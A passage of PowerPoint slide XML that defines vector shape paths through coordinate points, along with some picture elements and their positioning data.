                    <a:pt x="5689" y="1150454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1164031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1179817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135597" y="1232357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198297" y="1232357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318973" y="1211186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="1210538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="1310284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158102" y="1337856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5156" y="1285036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1298790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1314323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130581" y="1359420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206514" y="1359420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327355" y="1339164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="1312011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="1423504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="1423504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="1306880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830922" y="1254798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831989" y="1361808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="862609" y="1361516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861479" y="1249667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160754" y="1199515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="1185125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069632" y="1185125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="1190929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="1085570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160868" y="1063485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="1049083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073302" y="1049083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="1061186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="1090942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="1196060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694728" y="1247952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694728" y="1145273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="1090942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="1061186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861466" y="1086256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861466" y="987691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160754" y="937526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="923137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069632" y="923137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="928941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="822566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160754" y="801484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="787095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069632" y="787095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="798042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="827697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="934072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="963155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="992822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="1091628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="1120889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="1150645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="1253083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="1305153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="1208747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332867" y="1208747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="1150645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="1120889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="1146149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="1044892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="992822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="963155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694728" y="985964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694728" y="882662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676389" y="882662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="827697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="798042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861466" y="821994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861466" y="724115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832789" y="724115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160868" y="666559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="652157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073302" y="652157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="658888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="560578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160754" y="539496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="525106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069632" y="525106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="536054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="565708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="664260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="694715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="724458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="827125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="855078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="884732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="991095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="1043165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="937755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347687" y="937755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="884732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664108" y="855078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="879208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="779221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518693" y="779221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="724458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="694715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="778484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="675767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347687" y="675767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664222" y="622719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665251" y="718667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695871" y="718337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694778" y="617601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="565708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="536054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861466" y="560006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861466" y="461010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839089" y="461010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160868" y="404571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="390169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073302" y="390169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="396887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="298577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160754" y="277507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="263105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069632" y="263105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="274040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="303707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="402259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="432701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="462457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="565137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="617220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="517232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518541" y="517232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="462457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="432701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694944" y="456539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695871" y="364464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665251" y="364159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664273" y="461924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="516458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="413778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347433" y="413778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="303707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="274040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861466" y="297992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861466" y="193992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160868" y="1414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2" name="object 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCA8BB73-C52F-DF13-94C9-98B902B63CD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0947" y="3013163"/>
              <a:ext cx="200523" cy="180970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="object 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D815E8-9178-1950-8FD4-E5BBB57425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8075" y="2952505"/>
              <a:ext cx="192749" cy="178496"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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BFBC5DC6-D6A6-8802-B3E7-D0227593C03F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6264044" y="2884845"/>
              <a:ext cx="1195705" cy="1700530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="1030784" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="177162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1631561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171312" y="1699977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343403" y="1670199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178693" y="1670199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170344" y="1669325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174642" y="1668581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56291" y="1621313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="1621313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21035" y="1607232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="1607232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="204897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17928" y="204897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="189935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104983" y="189935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027925" y="31308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024054" y="29894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112634" y="29894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030784" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="174642" y="1668581"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170344" y="1669325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178693" y="1670199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174642" y="1668581"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="1164885" y="1497244"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="174642" y="1668581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178693" y="1670199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343403" y="1670199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="1522754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="1509996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="1509996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="1497244"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="21035" y="1607232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30625" y="1621313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="1611062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21035" y="1607232"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="30625" y="1611062"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30625" y="1621313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56291" y="1621313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="1611062"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="30625" y="1607232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21035" y="1607232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="1611062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="1607232"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="1177574" y="1495049"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="1497244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="1509996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177574" y="1495049"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="1195510" y="1495049"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1177574" y="1495049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="1509996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="1509996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="1495049"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="1164885" y="81328"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="1497244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177574" y="1495049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="1495049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="84990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174912" y="84990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="81328"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="30625" y="189935"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17928" y="204897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="202715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="189935"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="30625" y="202715"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17928" y="204897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="204897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="202715"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="104983" y="189935"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30625" y="189935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30625" y="202715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104983" y="189935"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="1164885" y="70748"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="81328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174912" y="84990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="70748"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="1195510" y="70748"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="70748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174912" y="84990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="84990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="70748"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="1112634" y="29894"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1024054" y="29894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1031964" y="30614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027925" y="31308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="81328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164885" y="70748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="70748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195510" y="60163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112634" y="29894"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1195704" h="1700529">
                  <a:moveTo>
                    <a:pt x="1024054" y="29894"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1027925" y="31308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1031964" y="30614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024054" y="298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5" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{296BB040-4F23-B1FA-32F4-EB4A2E53634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612" y="2970965"/>
              <a:ext cx="999877" cy="1590872"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1E8B07AA-B517-9D34-0254-0A9E29CC3DEC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6272734" y="2864623"/>
              <a:ext cx="1224915" cy="1751330"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="1058514" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1034415" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="180242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1674301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177249" y="1751257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432581" y="1705517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189310" y="1705517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175967" y="1703957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182870" y="1702721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82008" y="1658931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="1658931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32550" y="1637458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="1637458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="222949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27284" y="222949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="199922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159437" y="199922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046462" y="45366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1040691" y="43274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177919" y="43274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1058514" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="182870" y="1702721"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="175967" y="1703957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189310" y="1705517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182870" y="1702721"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="1177793" y="1524500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182870" y="1702721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189310" y="1705517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432581" y="1705517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224398" y="1563671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224398" y="1544082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="1544082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="1524500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="32550" y="1637458"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46604" y="1658931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="1643560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32550" y="1637458"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="46604" y="1643560"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46604" y="1658931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82008" y="1658931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="1643560"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="46604" y="1637458"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32550" y="1637458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="1643560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="1637458"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="1197056" y="1521050"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="1524500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="1544082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197056" y="1521050"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="1224398" y="1521050"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1197056" y="1521050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="1544082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224398" y="1544082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224398" y="1521050"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="1177793" y="92980"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="1524500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197056" y="1521050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224398" y="1521050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224397" y="98571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193215" y="98571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="92980"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="46604" y="199922"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27284" y="222949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="219582"/>
                  </a:lnTo>
                  <a:lnTo>
